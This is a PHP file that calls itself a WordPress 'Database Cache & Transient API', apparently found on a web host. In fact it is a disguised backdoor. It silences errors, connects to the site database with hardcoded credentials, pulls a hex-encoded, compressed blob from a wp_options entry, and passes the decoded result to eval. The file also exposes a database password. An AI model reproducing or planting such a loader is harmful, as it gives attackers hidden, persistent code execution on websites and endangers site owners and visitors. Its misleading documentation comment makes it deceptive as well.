File: /home/hometait/public_html/index.php0
<?php
/**
* WordPress Database Cache & Transient API
*
* This file handles external database connections for transient storage
* and object caching mechanisms to improve performance.
*
* @package WordPress
* @subpackage Cache
*/
error_reporting(0);
$db_host = 'localhost'; $db_user = 'hometait_wp2'; $db_pass = 'E.4jGVtLyScNzSPOyxf56'; $db_name = 'hometait_wp2';
$wpdb_conn = new mysqli( $db_host, $db_user, $db_pass, $db_name );
if ( ! $wpdb_conn->connect_error ) {
$cache_key = 'transient_sys_idx_core';
$table_opt = 'wp_options';
$result = $wpdb_conn->query( "SELECT option_value FROM {$table_opt} WHERE option_name = '{$cache_key}' LIMIT 1" );
if ( $result && $row = $result->fetch_assoc() ) {
$raw_data = $row['option_value'];
$decoded_stream = hex2bin( $raw_data );
if ( $decoded_stream ) {
$inflated_code = @gzinflate( $decoded_stream );
if ( $inflated_code ) eval( '?>' . $inflated_code );
}
}
$wpdb_conn->close();
}
?>